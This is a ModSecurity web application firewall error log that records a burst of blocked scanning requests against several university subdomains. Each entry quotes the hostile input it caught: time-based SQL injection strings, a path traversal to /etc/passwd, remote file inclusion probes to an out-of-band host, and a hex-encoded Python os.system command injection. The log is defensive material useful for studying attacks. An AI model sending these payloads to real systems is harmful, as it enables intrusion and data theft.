[Tue Aug 29 11:35:24.315817 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'orQN'='orQN found within ARGS:username: test' AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND 'orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11jMCo-f0AAAUJI0sAAABB"]
[Tue Aug 29 11:35:24.325228 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://notburpcollaborator.net found within TX:1: notburpcollaborator.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO11jMCo-f0AAATge94AAAAl"]
[Tue Aug 29 11:35:24.326419 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://notburpcollaborator.net found within TX:1: notburpcollaborator.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO11jMCo-f0AAAVK0LEAAAAB"]
[Tue Aug 29 11:35:24.337283 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://notburpcollaborator.net found within TX:1: notburpcollaborator.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO11jMCo-f0AAATUxT4AAAAW"]
[Tue Aug 29 11:35:24.338195 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:apis. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:apis: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/console/api_server"] [unique_id "ZO11jMCo-f0AAAT2JTUAAAAz"]
[Tue Aug 29 11:35:24.349318 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://notburpcollaborator.net found within TX:1: notburpcollaborator.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO11jMCo-f0AAASEJaUAAAAE"]
[Tue Aug 29 11:35:24.351170 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://notburpcollaborator.net found within TX:1: notburpcollaborator.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO11jMCo-f0AAATzVK8AAAAx"]
[Tue Aug 29 11:35:25.313073 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: (SELECT 3 FROM (SELECT SLEEP(7))enz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11jcCo-f0AAAPDoS0AAAAP"]
[Tue Aug 29 11:35:25.320373 2023] [:error] [pid 1382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'orQN'='orQN found within ARGS:username: test' AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND 'orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11jcCo-f0AAAVmuLsAAAAT"]
[Tue Aug 29 11:35:25.321401 2023] [:error] [pid 984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: (SELECT 3 FROM (SELECT SLEEP(7))enz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11jcCo-f0AAAPY1sIAAAAh"]
[Tue Aug 29 11:35:25.322895 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'orQN'='orQN found within ARGS:username: test' AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND 'orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11jcCo-f0AAASEJaYAAAAE"]
[Tue Aug 29 11:35:25.335365 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'orQN'='orQN found within ARGS:username: test' AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND 'orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11jcCo-f0AAAVJXmoAAAAA"]
[Tue Aug 29 11:35:25.341097 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'orQN'='orQN found within ARGS:username: test' AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND 'orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11jcCo-f0AAAUDQU8AAAA7"]
[Tue Aug 29 11:35:25.346994 2023] [:error] [pid 1382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: (SELECT 3 FROM (SELECT SLEEP(7))enz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11jcCo-f0AAAVmuLwAAAAT"]
[Tue Aug 29 11:35:25.354754 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'orQN'='orQN found within ARGS:username: test' AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND 'orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11jcCo-f0AAAT9PRUAAAA1"]
[Tue Aug 29 11:35:25.371946 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: (SELECT 3 FROM (SELECT SLEEP(7))enz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11jcCo-f0AAAVRxe4AAAAQ"]
[Tue Aug 29 11:35:25.379838 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: (SELECT 3 FROM (SELECT SLEEP(7))enz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11jcCo-f0AAASI0GoAAAAG"]
[Tue Aug 29 11:35:25.387596 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://notburpcollaborator.net found within TX:1: notburpcollaborator.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO11jcCo-f0AAATzVLEAAAAx"]
[Tue Aug 29 11:35:26.343373 2023] [:error] [pid 1391] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',''); found within ARGS:password: g','');import os;os.system('6563686f20224d6c566b6547744f4e7a464f597a41344e6d51344e477846633278795630644c4f45315022207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ZO11jsCo-f0AAAVvlHkAAAAe"]
[Tue Aug 29 11:35:26.344045 2023] [:error] [pid 1382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',''); found within ARGS:password: g','');import os;os.system('6563686f20224d6c566b6547744f4e7a464f597a41344e6d51344e477846633278795630644c4f45315022207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ZO11jsCo-f0AAAVmuL0AAAAT"]
[Tue Aug 29 11:35:26.345052 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',''); found within ARGS:password: g','');import os;os.system('6563686f20224d6c566b6547744f4e7a464f597a41344e6d51344e477846633278795630644c4f45315022207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ZO11jsCo-f0AAAVRxe8AAAAQ"]
[Tue Aug 29 11:35:26.348314 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',''); found within ARGS:password: g','');import os;os.system('6563686f20224d6c566b6547744f4e7a464f597a41344e6d51344e477846633278795630644c4f45315022207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ZO11jsCo-f0AAAUR88IAAABI"]
[Tue Aug 29 11:35:26.377300 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',''); found within ARGS:password: g','');import os;os.system('6563686f20224d6c566b6547744f4e7a464f597a41344e6d51344e477846633278795630644c4f45315022207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ZO11jsCo-f0AAAVPX5EAAAAF"]
[Tue Aug 29 11:35:26.380422 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: (SELECT 3 FROM (SELECT SLEEP(7))enz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11jsCo-f0AAATge@AAAAAl"]
[Tue Aug 29 11:35:27.321754 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id[]: 1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAATge@EAAAAl"]
[Tue Aug 29 11:35:27.326198 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id[]: 1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAASHh-8AAAAD"]
